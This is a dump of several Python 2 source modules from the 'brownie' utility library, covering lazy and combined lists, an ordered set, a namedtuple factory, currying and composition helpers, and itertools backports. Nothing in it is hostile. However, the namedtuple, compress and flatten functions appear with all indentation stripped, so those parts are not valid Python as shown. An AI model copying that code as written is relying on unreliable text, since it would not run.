        This method exhausts the internal iterator.
        """
        return self.known_length
    def __contains__(self, other):
        # iterating self lazily exhausts only as far as needed
        for item in self:
            if item == other:
                return True
        return False
    @exhausting
    def __eq__(self, other):
        """
        Returns ``True`` if the list is equal to the given `other` list, which
        may be another :class:`LazyList`, a :class:`list` or a subclass of
        either.

        This method exhausts the internal iterator.
        """
        if isinstance(other, (self.__class__, list)):
            return self._collected_data == other
        return False
    def __ne__(self, other):
        """
        Returns ``True`` if the list is unequal to the given `other` list, which
        may be another :class:`LazyList`, a :class:`list` or a subclass of
        either.

        This method exhausts the internal iterator.
        """
        return not self.__eq__(other)
    # mutable sequence, therefore unhashable
    __hash__ = None
    def __nonzero__(self):
        """
        Returns ``True`` if the list is not empty.

        This method takes one item from the internal iterator.
        """
        self._exhaust(0)
        return bool(self._collected_data)
    def __lt__(self, other):
        """
        This method returns ``True`` if this list is "lower than" the given
        `other` list. This is the case if...

        - this list is empty and the other is not.
        - the first nth item in this list which is unequal to the
          corresponding item in the other list, is lower than the corresponding
          item.

        If this and the other list is empty this method will return ``False``.
        """
        if isinstance(other, (self.__class__, list)):
            other = list(other)
        return list(self) < other
    def __gt__(self, other):
        """
        This method returns ``True`` if this list is "greater than" the given
        `other` list. This is the case if...

        - this list is not empty and the other is
        - the first nth item in this list which is unequal to the
          corresponding item in the other list, is greater than the
          corresponding item.

        If this and the other list is empty this method will return ``False``.
        """
        if isinstance(other, (self.__class__, list)):
            other = list(other)
        return list(self) > other
    def __add__(self, other):
        if isinstance(other, (list, self.__class__)):
            # lazily concatenates; neither operand is exhausted here
            return self.__class__(chain(self, other))
        raise TypeError("can't concatenate with non-list: {0}".format(other))
    def __iadd__(self, other):
        self.extend(other)
        return self
    def __mul__(self, other):
        if isinstance(other, int):
            self._exhaust()
            return self.__class__(self._collected_data * other)
        raise TypeError("can't multiply sequence by non-int: {0}".format(other))
    def __imul__(self, other):
        if isinstance(other, int):
            self._exhaust()
            self._collected_data *= other
            return self
        else:
            raise TypeError(
                "can't multiply sequence by non-int: {0}".format(other)
            )
    @exhausting
    def __getstate__(self):
        # pickling requires a concrete list, so the iterator is exhausted
        return self._collected_data
    def __setstate__(self, state):
        self.exhausted = True
        self._collected_data = state
    def __repr__(self):
        """
        Returns the representation string of the list, if the list exhausted
        this looks like the representation of any other list, otherwise the
        "lazy" part is represented by "...", like "[1, 2, 3, ...]".
        """
        if self.exhausted:
            return repr(self._collected_data)
        elif not self._collected_data:
            return '[...]'
        return '[%s, ...]' % ', '.join(
            repr(obj) for obj in self._collected_data
        )
    # remove the decorator helper from the class namespace (see above)
    del exhausting
class CombinedSequence(object):
    """
    A sequence combining other sequences.

    .. versionadded:: 0.5
    """
    def __init__(self, sequences):
        self.sequences = list(sequences)

    def at_index(self, index):
        """
        Returns the sequence and the 'sequence local' index::

            >>> foo = [1, 2, 3]
            >>> bar = [4, 5, 6]
            >>> cs = CombinedSequence([foo, bar])
            >>> cs[3]
            4
            >>> cs.at_index(3)
            ([4, 5, 6], 0)
        """
        offset = 0
        if index >= 0:
            # scan forwards, counting the items preceding each sequence
            for seq in self.sequences:
                if offset <= index < offset + len(seq):
                    return seq, index - offset
                offset += len(seq)
        else:
            # scan backwards for negative indices
            for seq in reversed(self.sequences):
                if offset >= index > offset - len(seq):
                    return seq, index - offset
                offset -= len(seq)
        raise IndexError(index)

    def __getitem__(self, index):
        if isinstance(index, slice):
            return list(iter(self))[index]
        seq, local_index = self.at_index(index)
        return seq[local_index]

    def __len__(self):
        return sum(len(seq) for seq in self.sequences)

    def __iter__(self):
        return chain.from_iterable(self.sequences)

    def __reversed__(self):
        return chain.from_iterable(reversed(map(reversed, self.sequences)))

    def __eq__(self, other):
        if isinstance(other, list):
            return list(self) == other
        if isinstance(other, self.__class__):
            return self.sequences == other.sequences
        return False

    def __ne__(self, other):
        return not self == other

    __hash__ = None

    def __mul__(self, times):
        if not isinstance(times, int):
            return NotImplemented
        return list(self) * times

    def __rmul__(self, times):
        if not isinstance(times, int):
            return NotImplemented
        return times * list(self)

    def __repr__(self):
        return '%s(%r)' % (self.__class__.__name__, self.sequences)
class CombinedList(CombinedSequence):
    """
    A list combining other lists.

    Mutations are applied to the underlying lists in-place.

    .. versionadded:: 0.5
    """
    def count(self, item):
        """
        Returns the number of occurrences of the given `item`.
        """
        return sum(sequence.count(item) for sequence in self.sequences)

    def index(self, item, start=None, stop=None):
        """
        Returns the index of the first occurence of the given `item` between
        `start` and `stop`.
        """
        start = 0 if start is None else start
        for index, it in enumerate(self[start:stop]):
            if item == it:
                return index + start
        raise ValueError('%r not in list' % item)

    def __setitem__(self, index, item):
        if isinstance(index, slice):
            start = 0 if index.start is None else index.start
            stop = len(self) if index.stop is None else index.stop
            step = 1 if index.step is None else index.step
            # assignments do not shift positions, so the order is irrelevant
            for global_index, value in zip(range(start, stop, step), item):
                self[global_index] = value
        else:
            target, local_index = self.at_index(index)
            target[local_index] = item

    def __delitem__(self, index):
        if isinstance(index, slice):
            start = 0 if index.start is None else index.start
            stop = len(self) if index.stop is None else index.stop
            step = 1 if index.step is None else index.step
            # BUG FIX: delete from the highest global index downwards.
            # Previously the (sequence, local index) pairs were computed for
            # ascending indices and deleted in that order, but each deletion
            # shifts every following position, so the wrong items (or out of
            # range indices) were removed.
            for global_index in sorted(range(start, stop, step), reverse=True):
                target, local_index = self.at_index(global_index)
                del target[local_index]
        else:
            target, local_index = self.at_index(index)
            del target[local_index]

    def append(self, item):
        """
        Appends the given `item` to the end of the list.
        """
        self.sequences[-1].append(item)

    def extend(self, items):
        """
        Extends the list by appending from the given iterable.
        """
        self.sequences[-1].extend(items)

    def insert(self, index, item):
        """
        Inserts the given `item` before the item at the given `index`.
        """
        target, local_index = self.at_index(index)
        target.insert(local_index, item)

    def pop(self, index=-1):
        """
        Removes and returns the item at the given `index`.

        An :exc:`IndexError` is raised if the index is out of range.
        """
        target, local_index = self.at_index(index)
        return target.pop(local_index)

    def remove(self, item):
        """
        Removes the first occurence of the given `item` from the list.
        """
        for sequence in self.sequences:
            try:
                return sequence.remove(item)
            except ValueError:
                # we may find a value in the next sequence
                pass
        raise ValueError('%r not in list' % item)

    def _set_values(self, values):
        # distribute `values` over the underlying lists, keeping each list's
        # original length
        lengths = map(len, self.sequences)
        previous_length = 0
        for length in lengths:
            stop = previous_length + length
            self[previous_length:stop] = values[previous_length:stop]
            previous_length += length

    def reverse(self):
        """
        Reverses the list in-place::

            >>> a = [1, 2, 3]
            >>> b = [4, 5, 6]
            >>> l = CombinedList([a, b])
            >>> l.reverse()
            >>> a
            [6, 5, 4]
        """
        self._set_values(self[::-1])

    def sort(self, cmp=None, key=None, reverse=False):
        """
        Sorts the list in-place, see :meth:`list.sort`.
        """
        self._set_values(sorted(self, cmp, key, reverse))
def namedtuple(typename, field_names, verbose=False, rename=False, doc=None):
"""
Returns a :class:`tuple` subclass named `typename` with a limited number
of possible items who are accessible under their field name respectively.
Due to the implementation `typename` as well as all `field_names` have to
be valid python identifiers also the names used in `field_names` may not
repeat themselves.
You can solve the latter issue for `field_names` by passing ``rename=True``,
any given name which is either a keyword or a repetition is then replaced
with `_n` where `n` is an integer increasing with every rename starting by
1.
:func:`namedtuple` creates the code for the subclass and executes it
internally you can view that code by passing ``verbose==True``, which will
print the code.
Unlike :class:`tuple` a named tuple provides several methods as helpers:
.. class:: SomeNamedTuple(foo, bar)
.. classmethod:: _make(iterable)
Returns a :class:`SomeNamedTuple` populated with the items from the
given `iterable`.
.. method:: _asdict()
Returns a :class:`dict` mapping the field names to their values.
.. method:: _replace(**kwargs)
Returns a :class:`SomeNamedTuple` values replaced with the given
ones::
>>> t = SomeNamedTuple(1, 2)
>>> t._replace(bar=3)
SomeNamedTuple(foo=1, bar=3)
# doctest: DEACTIVATE
.. note::
:func:`namedtuple` is compatible with :func:`collections.namedtuple`.
.. versionadded:: 0.5
"""
def name_generator():
for i in count(1):
yield '_%d' % i
make_name = name_generator().next
if iskeyword(typename):
raise ValueError('the given typename is a keyword: %s' % typename)
if isinstance(field_names, basestring):
field_names = field_names.replace(',', ' ').split()
real_field_names = []
seen_names = set()
for name in field_names:
if iskeyword(name):
if rename:
name = make_name()
else:
raise ValueError('a given field name is a keyword: %s' % name)
elif name in seen_names:
if rename:
name = make_name()
else:
raise ValueError('a field name has been repeated: %s' % name)
real_field_names.append(name)
seen_names.add(name)
code = textwrap.dedent("""
from operator import itemgetter
class %(typename)s(tuple):
'''%(docstring)s'''
_fields = %(fields)s
@classmethod
def _make(cls, iterable):
result = tuple.__new__(cls, iterable)
if len(result) > %(field_count)d:
raise TypeError(
'expected %(field_count)d arguments, got %%d' %% len(result)
)
return result
def __new__(cls, %(fieldnames)s):
return tuple.__new__(cls, (%(fieldnames)s))
def _asdict(self):
return dict(zip(self._fields, self))
def _replace(self, **kwargs):
result = self._make(map(kwargs.pop, %(fields)s, self))
if kwargs:
raise ValueError(
'got unexpected arguments: %%r' %% kwargs.keys()
)
return result
def __getnewargs__(self):
return tuple(self)
def __repr__(self):
return '%(typename)s(%(reprtext)s)' %% self
""") % {
'typename': typename,
'fields': repr(tuple(real_field_names)),
'fieldnames': ', '.join(real_field_names),
'field_count': len(real_field_names),
'reprtext': ', '.join(name + '=%r' for name in real_field_names),
'docstring': doc or typename + '(%s)' % ', '.join(real_field_names)
}
for i, name in enumerate(real_field_names):
code += ' %s = property(itemgetter(%d))\n' % (name, i)
if verbose:
print code
namespace = {}
# there should never occur an exception here but if one does I'd rather
# have the source to see what is going on
try:
exec code in namespace
except SyntaxError, e: # pragma: no cover
raise SyntaxError(e.args[0] + ':\n' + code)
result = namespace[typename]
return result
__all__ = ['LazyList', 'CombinedSequence', 'CombinedList', 'namedtuple']
########NEW FILE########
__FILENAME__ = sets
# coding: utf-8
"""
brownie.datastructures.sets
~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from functools import wraps
from brownie.itools import chain
from brownie.datastructures.mappings import OrderedDict
class OrderedSet(object):
    """
    A :class:`set` which remembers insertion order.

    .. versionadded:: 0.2
    """
    def requires_set(func):
        # internal decorator (deleted from the namespace below): binary
        # operators cooperate only with set-like objects and return
        # NotImplemented otherwise
        @wraps(func)
        def wrapper(self, other):
            if isinstance(other, (self.__class__, set, frozenset)):
                return func(self, other)
            return NotImplemented
        return wrapper
    def __init__(self, iterable=None):
        # an ordered mapping with all-None values doubles as an ordered set
        self._orderedmap = OrderedDict.fromkeys(iterable or ())
    def __len__(self):
        return len(self._orderedmap)
    def __contains__(self, element):
        return element in self._orderedmap
    def add(self, element):
        """Adds `element` to the set, remembering its insertion position."""
        self._orderedmap[element] = None
    def remove(self, element):
        """Removes `element`; raises :exc:`KeyError` if it is missing."""
        del self._orderedmap[element]
    def discard(self, element):
        """Removes `element` if it is present."""
        self._orderedmap.pop(element, None)
    def pop(self, last=True):
        """
        Returns the last element if `last` is ``True``, the first otherwise.
        """
        if not self:
            raise KeyError('set is empty')
        element = self._orderedmap.popitem(last=last)[0]
        return element
    def clear(self):
        self._orderedmap.clear()
    def update(self, *others):
        """Adds the elements of each given iterable."""
        for other in others:
            for element in other:
                self._orderedmap[element] = None
    def copy(self):
        return self.__class__(self)
    @requires_set
    def __ior__(self, other):
        self.update(other)
        return self
    def issubset(self, other):
        return all(element in other for element in self)
    @requires_set
    def __le__(self, other):
        return self.issubset(other)
    @requires_set
    def __lt__(self, other):
        return self.issubset(other) and self != other
    def issuperset(self, other):
        return all(element in self for element in other)
    @requires_set
    def __ge__(self, other):
        return self.issuperset(other)
    @requires_set
    def __gt__(self, other):
        return self.issuperset(other) and self != other
    def union(self, *others):
        return self.__class__(chain.from_iterable((self, ) + others))
    @requires_set
    def __or__(self, other):
        return self.union(other)
    def intersection(self, *others):
        def intersect(a, b):
            # Iterate the larger operand and test membership in the
            # smaller one.  The previous min()/max() based selection
            # picked `a` for BOTH on equal lengths, so `b` was ignored
            # entirely and the intersection was silently wrong.
            result = self.__class__()
            if len(a) <= len(b):
                smaller, larger = a, b
            else:
                smaller, larger = b, a
            for element in larger:
                if element in smaller:
                    result.add(element)
            return result
        # start from a copy: with no `others` the set API returns a new
        # set; returning `self` itself would alias future mutations
        return reduce(intersect, others, self.copy())
    @requires_set
    def __and__(self, other):
        return self.intersection(other)
    @requires_set
    def __iand__(self, other):
        intersection = self.intersection(other)
        self.clear()
        self.update(intersection)
        return self
    def difference(self, *others):
        return self.__class__(
            key for key in self if not any(key in s for s in others)
        )
    @requires_set
    def __sub__(self, other):
        return self.difference(other)
    @requires_set
    def __isub__(self, other):
        diff = self.difference(other)
        self.clear()
        self.update(diff)
        return self
    def symmetric_difference(self, other):
        other = self.__class__(other)
        return self.__class__(chain(self - other, other - self))
    @requires_set
    def __xor__(self, other):
        return self.symmetric_difference(other)
    @requires_set
    def __ixor__(self, other):
        diff = self.symmetric_difference(other)
        self.clear()
        self.update(diff)
        return self
    def __iter__(self):
        return iter(self._orderedmap)
    def __reversed__(self):
        return reversed(self._orderedmap)
    def __eq__(self, other):
        # equality against another OrderedSet is order-sensitive,
        # against plain sets it is order-insensitive
        if isinstance(other, self.__class__):
            return len(self) == len(other) and list(self) == list(other)
        return set(self) == other
    def __ne__(self, other):
        return not self.__eq__(other)
    # mutable, therefore unhashable
    __hash__ = None
    def __repr__(self):
        content = repr(list(self)) if self else ''
        return '%s(%s)' % (self.__class__.__name__, content)
    del requires_set
__all__ = ['OrderedSet']
########NEW FILE########
__FILENAME__ = functional
# coding: utf-8
"""
brownie.functional
~~~~~~~~~~~~~~~~~~
Implements functions known from functional programming languages and other
things which are useful when dealing with functions.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from inspect import getargspec
from functools import wraps
from brownie.itools import izip_longest, unique
from brownie.datastructures import namedtuple, FixedDict
def compose(*functions):
    """
    Returns a function which acts as a composition of several `functions`. If
    one function is given it is returned if no function is given a
    :exc:`TypeError` is raised.

    >>> from brownie.functional import compose
    >>> compose(lambda x: x + 1, lambda x: x * 2)(1)
    3

    .. note:: Each function (except the last one) has to take the result of
       the last function as argument.
    """
    if not functions:
        raise TypeError('expected at least 1 argument, got 0')
    elif len(functions) == 1:
        return functions[0]
    def composed(*args, **kwargs):
        # apply the right-most function to the arguments, then feed the
        # result leftwards through the remaining functions
        pending = list(functions)
        result = pending.pop()(*args, **kwargs)
        while pending:
            result = pending.pop()(result)
        return result
    return composed
def flip(function):
    """
    Returns a function which behaves like `function` but gets the given
    positional arguments reversed; keyword arguments are passed through.

    >>> from brownie.functional import flip
    >>> def f(a, b): return a
    >>> f(1, 2)
    1
    >>> flip(f)(1, 2)
    2
    """
    @wraps(function)
    def flipped(*args, **kwargs):
        return function(*args[::-1], **kwargs)
    return flipped
class Signature(namedtuple('SignatureBase', [
        'positionals', 'kwparams', 'varargs', 'varkwargs'
    ])):
    """
    A named tuple representing a function signature.

    :param positionals:
        A list of required positional parameters.

    :param kwparams:
        A list containing the keyword arguments, each as a tuple containing the
        name and default value, in order of their appearance in the function
        definition.

    :param varargs:
        The name used for arbitrary positional arguments or `None`.

    :param varkwargs:
        The name used for arbitary keyword arguments or `None`.

    .. warning::
        The size of :class:`Signature` tuples may change in the future to
        accommodate additional information like annotations. Therefore you
        should not rely on it.

    .. versionadded:: 0.5
    """
    @classmethod
    def from_function(cls, func):
        """
        Constructs a :class:`Signature` from the given function or method.
        """
        func = getattr(func, 'im_func', func)  # unwrap (un)bound methods
        params, varargs, varkwargs, defaults = getargspec(func)
        defaults = [] if defaults is None else defaults
        # Parameters with defaults always come last, so stripping
        # `len(defaults)` names off the end leaves the required
        # positionals:
        #   all params have defaults -> params[:0]           (none required)
        #   no defaults at all       -> params[:len(params)] (all required)
        #   otherwise                -> params[:-len(defaults)]
        return cls(
            params[
                :0 if len(defaults) == len(params)
                else -len(defaults) or len(params)
            ],
            zip(params[-len(defaults):], defaults),
            varargs,
            varkwargs
        )
    def bind_arguments(self, args=(), kwargs=None):
        """
        Returns a dictionary with the names of the parameters as keys with
        their arguments as values.

        Raises a :exc:`ValueError` if there are too many `args` and/or `kwargs`
        that are missing or repeated.
        """
        kwargs = {} if kwargs is None else kwargs
        required = set(self.positionals)
        overwritable = set(name for name, default in self.kwparams)
        settable = required | overwritable
        positional_count = len(self.positionals)
        kwparam_count = len(self.kwparams)
        # start from the defaults, overridden by the positional arguments
        result = dict(self.kwparams, **dict(zip(self.positionals, args)))
        # surplus positional arguments fill keyword parameters in order
        remaining = args[positional_count:]
        for (param, _), arg in zip(self.kwparams, remaining):
            result[param] = arg
            # explicitly given positionally, may not be repeated as keyword
            overwritable.discard(param)
        if len(remaining) > kwparam_count:
            if self.varargs is None:
                raise ValueError(
                    'expected at most %d positional arguments, got %d' % (
                        positional_count + kwparam_count,
                        len(args)
                    )
                )
            else:
                result[self.varargs] = tuple(remaining[kwparam_count:])
        # NOTE(review): this reassignment of `remaining` appears unused
        remaining = {}
        unexpected = []
        for key, value in kwargs.iteritems():
            if key in result and key not in overwritable:
                raise ValueError("got multiple values for '%s'" % key)
            elif key in settable:
                result[key] = value
            elif self.varkwargs:
                result_kwargs = result.setdefault(self.varkwargs, {})
                result_kwargs[key] = value
            else:
                unexpected.append(key)
        # report unexpected keyword arguments, nicely pluralized
        if len(unexpected) == 1:
            raise ValueError(
                "got unexpected keyword argument '%s'" % unexpected[0]
            )
        elif len(unexpected) == 2:
            raise ValueError(
                "got unexpected keyword arguments '%s' and '%s'" % tuple(unexpected)
            )
        elif unexpected:
            raise ValueError("got unexpected keyword arguments %s and '%s'" % (
                ', '.join("'%s'" % arg for arg in unexpected[:-1]), unexpected[-1]
            ))
        # every required positional must have been bound by now
        if set(result) < set(self.positionals):
            missing = set(result) ^ set(self.positionals)
            if len(missing) == 1:
                raise ValueError("'%s' is missing" % missing.pop())
            elif len(missing) == 2:
                raise ValueError("'%s' and '%s' are missing" % tuple(missing))
            else:
                missing = tuple(missing)
                raise ValueError("%s and '%s' are missing" % (
                    ', '.join("'%s'" % name for name in missing[:-1]), missing[-1]
                ))
        if self.varargs:
            result.setdefault(self.varargs, ())
        if self.varkwargs:
            result.setdefault(self.varkwargs, {})
        return result
class curried(object):
    """
    :class:`curried` is a decorator providing currying for callable objects.

    Each call to the curried callable returns a new curried object unless it
    is called with every argument required for a 'successful' call to the
    function::

        >>> foo = curried(lambda a, b, c: a + b * c)
        >>> foo(1, 2, 3)
        6
        >>> bar = foo(c=2)
        >>> bar(2, 3)
        8
        >>> baz = bar(3)
        >>> baz(3)
        9

    By the way if the function takes arbitrary positional and/or keyword
    arguments this will work as expected.

    .. versionadded:: 0.5
    """
    def __init__(self, function):
        self.function = function
        self.signature = Signature.from_function(function)
        # every parameter name, in declaration order
        self.params = self.signature.positionals + [
            name for name, default in self.signature.kwparams
        ]
        # arguments collected so far
        self.args = {}
        # keyword parameters whose value may still be overridden
        # NOTE(review): this set is shared between the objects produced
        # by _updated() below -- confirm that sharing is intended
        self.changeable_args = set(
            name for name, default in self.signature.kwparams
        )
    @property
    def remaining_params(self):
        # parameters not yet pinned by a collected argument
        return unique(self.params, set(self.args) - self.changeable_args)
    def _updated(self, args):
        # clone without calling __init__ and swap in the new arguments
        result = object.__new__(self.__class__)
        result.__dict__.update(self.__dict__)
        result.args = args
        return result
    def __call__(self, *args, **kwargs):
        collected_args = self.args.copy()
        # match positional arguments against still-missing parameters
        for remaining, arg in izip_longest(self.remaining_params, args):
            if remaining is None:
                # more arguments than parameters: they belong to *args
                if self.signature.varargs is None:
                    raise TypeError('unexpected positional argument: %r' % arg)
                collected_args.setdefault(self.signature.varargs, []).append(arg)
            elif arg is None:
                # fewer arguments than parameters
                # NOTE(review): a literal None argument is indistinguishable
                # from "missing" here -- confirm this limitation is intended
                break
            else:
                collected_args[remaining] = arg
                self.changeable_args.discard(remaining)
        for key, value in kwargs.iteritems():
            if key in self.params:
                if key in collected_args:
                    raise TypeError("'%s' has been repeated: %r" % (key, value))
                self.changeable_args.discard(key)
                collected_args[key] = value
            else:
                if self.signature.varkwargs is None:
                    raise TypeError(
                        '%s is an unexpected keyword argument: %r' % (
                            key, value
                        )
                    )
                else:
                    collected_args.setdefault(
                        self.signature.varkwargs,
                        FixedDict()
                    )[key] = value
        if set(self.signature.positionals) <= set(collected_args):
            # every required parameter is present: perform the real call.
            # (A dead `func_kwargs = dict(...)` assignment that was
            # immediately overwritten here has been removed.)
            func_kwargs = FixedDict(self.signature.kwparams, **collected_args)
            func_kwargs.update(func_kwargs.pop(self.signature.varkwargs, {}))
            args = map(func_kwargs.pop, self.params)
            args += func_kwargs.pop(self.signature.varargs, [])
            return self.function(*args, **func_kwargs)
        return self._updated(collected_args)
def fmap(obj, functions):
    """
    Returns a generator yielding `function(obj)` for each function in
    `functions`.

    `functions` may contain iterables of functions instead of functions which
    will be composed and called with `obj`.

    .. versionadded:: 0.6
    """
    for entry in functions:
        try:
            parts = tuple(entry)
        except TypeError:
            # a plain callable
            yield entry(obj)
        else:
            # an iterable of callables: compose and apply
            yield compose(*parts)(obj)
__all__ = ['compose', 'flip', 'Signature', 'curried', 'fmap']
########NEW FILE########
__FILENAME__ = importing
# coding: utf-8
"""
brownie.importing
~~~~~~~~~~~~~~~~~
.. versionadded:: 0.2
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
import re
_identifier_re = re.compile(r'^[a-zA-Z_][a-zA-Z0-9_]*$')
def _raise_identifier(identifier):
    # reject anything that is not a valid Python identifier
    match = _identifier_re.match(identifier)
    if not match:
        raise ValueError('invalid identifier: %s' % identifier)
def import_string(name):
    """
    Imports and returns an object given its `name` as a string.

    As an addition to the normal way import paths are specified you can use
    a colon to delimit the object you want to import.

    If the given name is invalid a :exc:`ValueError` is raised, if the module
    cannot be imported an :exc:`ImportError`.

    Beware of the fact that in order to import a module it is executed and
    therefore any exception could be raised, especially when dealing with
    third party code e.g. if you implement a plugin system.
    """
    if ':' in name:
        module_name, attribute = name.split(':', 1)
    elif '.' in name:
        module_name, attribute = name.rsplit('.', 1)
    else:
        # a plain module name without an attribute part
        _raise_identifier(name)
        return __import__(name)
    for part in module_name.split('.') + [attribute]:
        _raise_identifier(part)
    module = __import__(module_name, globals=None, locals=None,
                        fromlist=[attribute])
    return getattr(module, attribute)
__all__ = ['import_string']
########NEW FILE########
__FILENAME__ = itools
# coding: utf-8
"""
brownie.itools
~~~~~~~~~~~~~~
Implements :mod:`itertools` functions for earlier version of Python.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, PSF see LICENSE.rst for details
"""
from itertools import repeat, izip
class chain(object):
    """
    An iterator which yields elements from the given `iterables` until each
    iterable is exhausted.

    .. versionadded:: 0.2
    """
    @classmethod
    def from_iterable(cls, iterable):
        """
        Alternative constructor which takes an `iterable` yielding iterators,
        this can be used to chain an infinite number of iterators.
        """
        rv = object.__new__(cls)
        rv._init(iterable)
        return rv
    def __init__(self, *iterables):
        self._init(iterables)
    def _init(self, iterables):
        self.iterables = iter(iterables)
        self.current_iterable = iter([])
    def __iter__(self):
        return self
    def next(self):
        # Loop so that an empty iterable is skipped instead of ending the
        # chain prematurely: previously the StopIteration raised by the
        # freshly-started iterable escaped, so chain([], [1]) yielded
        # nothing.  StopIteration from `self.iterables` itself propagates
        # and correctly terminates the iteration.
        while True:
            try:
                return next(self.current_iterable)
            except StopIteration:
                self.current_iterable = iter(next(self.iterables))
    # Python 3 compatible alias.
    __next__ = next
def izip_longest(*iterables, **kwargs):
    """
    Make an iterator that aggregates elements from each of the iterables. If
    the iterables are of uneven length, missing values are filled-in with
    `fillvalue`. Iteration continues until the longest iterable is exhausted.

    If one of the iterables is potentially infinite, then the
    :func:`izip_longest` function should be wrapped with something that limits
    the number of calls (for example :func:`itertools.islice` or
    :func:`itertools.takewhile`.) If not specified, `fillvalue` defaults to
    ``None``.

    .. note:: Software and documentation for this function are taken from
              CPython, :ref:`license details <psf-license>`.
    """
    fillvalue = kwargs.get('fillvalue')
    # `counter` is shared by every sentinel via the default argument: each
    # exhausted iterable pops once, and the pop on the last remaining
    # iterable raises IndexError, which terminates the izip loop below.
    def sentinel(counter=([fillvalue] * (len(iterables) - 1)).pop):
        yield counter()
    fillers = repeat(fillvalue)
    # each iterable is padded with one sentinel and then infinite fillers;
    # relies on the local `chain` class defined above
    iters = [chain(it, sentinel(), fillers) for it in iterables]
    try:
        for tup in izip(*iters):
            yield tup
    except IndexError:
        pass
def permutations(iterable, r=None):
    """
    Return successive `r` length permutations of elements in the `iterable`.

    If `r` is not specified or is ``None``, then `r` defaults to the length of
    the `iterable` and all possible full-length permutations are generated.

    Permutations are emitted in lexicographic sort order. So, if the input
    `iterable` is sorted, the permutation tuples will be produced in sorted
    order.

    Elements are treated as unique based on their position, not on their
    value. So if the input elements are unique, there will be no repeating
    value in each permutation.

    The number of items returned is ``n! / (n - r)!`` when ``0 <= r <= n`` or
    zero when `r > n`.

    .. note:: Software and documentation for this function are taken from
              CPython, :ref:`license details <psf-license>`.
    """
    pool = tuple(iterable)
    size = len(pool)
    r = size if r is None else r
    for candidate in product(range(size), repeat=r):
        # keep only index tuples without repeated positions
        if len(set(candidate)) == r:
            yield tuple(pool[position] for position in candidate)
def product(*iterables, **kwargs):
    """
    Cartesian product of input iterables.

    Equivalent to nested for-loops in a generator expression. For example,
    ``product(A, B)`` returns the same as ``((x, y) for x in A for y in B)``.

    The nested loops cycle like an odometer with the rightmost element
    advancing on every iteration. The pattern creates a lexicographic ordering
    so that if the input's iterables are sorted, the product tuples are emitted
    in sorted order.

    To compute the product of an iterable with itself, specify the number of
    repetitions with the optional `repeat` keyword argument. For example,
    ``product(A, repeat=4)`` means the same as ``product(A, A, A, A)``.

    .. note:: Software and documentation for this function are taken from
              CPython, :ref:`license details <psf-license>`.
    """
    repeat = kwargs.get('repeat', 1)
    pools = [tuple(pool) for pool in iterables] * repeat
    outcome = [[]]
    for pool in pools:
        # extend every partial combination by every element of this pool
        outcome = [combination + [element]
                   for combination in outcome
                   for element in pool]
    for combination in outcome:
        yield tuple(combination)
def starmap(function, iterable):
    """
    Make an iterator that computes the function using arguments obtained from
    the iterable. Used instead of :func:`itertools.imap` when an argument
    parameters are already grouped in tuples from a single iterable (the data
    has been "pre-zipped"). The difference between :func:`itertools.imap` and
    :func:`starmap` parallels the distinction between ``function(a, b)`` and
    ``function(*c)``.

    .. note:: Software and documentation for this function are taken from
              CPython, :ref:`license details <psf-license>`.
    """
    for packed_args in iterable:
        # unpack each pre-zipped argument tuple into the call
        yield function(*packed_args)
def combinations_with_replacement(iterable, r):
    """
    Return `r` length sub-sequences of elements from the `iterable` allowing
    individual elements to be replaced more than once.

    Combinations are emitted in lexicographic sort order. So, if the input
    `iterable` is sorted, the combinations tuples will be produced in sorted
    order.

    Elements are treated as unique based on their position, not on their value.
    So if the input elements are unique, the generated combinations will also
    be unique.

    The number of items returned is ``(n + r - 1)! / r! / (n - 1)!`` when
    ``n > 0``.

    .. note:: Software and documentation for this function are taken from
              CPython, :ref:`license details <psf-license>`.
    """
    pool = tuple(iterable)
    size = len(pool)
    for candidate in product(xrange(size), repeat=r):
        # non-decreasing index tuples correspond exactly to combinations
        if list(candidate) == sorted(candidate):
            yield tuple(pool[position] for position in candidate)
def compress(data, selectors):
"""
Make an iterator that filters elements from the `data` returning only
those that have a corresponding element in `selectors` that evaluates to
``True``. Stops when either the `data` or `selectors` iterables have been
exhausted.
.. note:: Software and documentation for this function are taken from
CPython, :ref:`license details <psf-license>`.
"""
return (d for d, s in izip(data, selectors) if s)
def count(start=0, step=1):
    """
    Make an iterator that returns evenly spaced values starting with `start`.
    Often used as an argument to :func:`imap` to generate consecutive data
    points. Also, used with :func:`izip` to add sequence numbers.

    When counting with floating point numbers, better accuracy can sometimes
    be achieved by substituting multiplicative code such as:
    ``(start + step * i for i in count())``.

    .. note:: Software and documentation for this function are taken from
              CPython, :ref:`license details <psf-license>`.
    """
    value = start
    while True:
        yield value
        value += step
def grouped(n, iterable, fillvalue=None):
    """
    Groups the items in the given `iterable` to tuples of size `n`. In order
    for groups to always be of the size `n` the `fillvalue` is used for
    padding.
    """
    # the same iterator repeated n times: izip_longest pulls n consecutive
    # items per output tuple
    repeated = [iter(iterable)] * n
    return izip_longest(fillvalue=fillvalue, *repeated)
def unique(iterable, seen=None):
    """
    Yields items from the given `iterable` of (hashable) items, once seen an
    item is not yielded again.

    :param seen:
        An iterable specifying already 'seen' items which will be excluded
        from the result.

    .. versionadded:: 0.5

    .. versionchanged:: 0.5
       Items don't have to be hashable any more.
    """
    encountered = set() if seen is None else set(seen)
    encountered_unhashable = []
    for element in iterable:
        try:
            if element not in encountered:
                encountered.add(element)
                yield element
        except TypeError:
            # unhashable elements fall back to a (slower) list lookup
            if element not in encountered_unhashable:
                encountered_unhashable.append(element)
                yield element
def flatten(iterable, ignore=(basestring, )):
"""
Flattens a nested `iterable`.
:param ignore:
Types of iterable objects which should be yielded as-is.
.. versionadded:: 0.5
"""
stack = [iter(iterable)]
while stack:
try:
item = stack[-1].next()
if isinstance(item, ignore):
yield item
elif isinstance(item, basestring) and len(item) == 1:
yield item
else:
try:
stack.append(iter(item))
except TypeError:
yield item
except StopIteration:
stack.pop()
__all__ = [
'chain', 'izip_longest', 'permutations', 'product', 'starmap',
'combinations_with_replacement', 'compress', 'count', 'grouped', 'unique',
'flatten'
]
########NEW FILE########
__FILENAME__ = parallel
# coding: utf-8
"""
brownie.parallel
~~~~~~~~~~~~~~~~
Implements useful parallelization stuff.
:copyright: 2010-2011 by Daniel Neuhaeuser
:license: BSD, see LICENSE.rst for details
"""
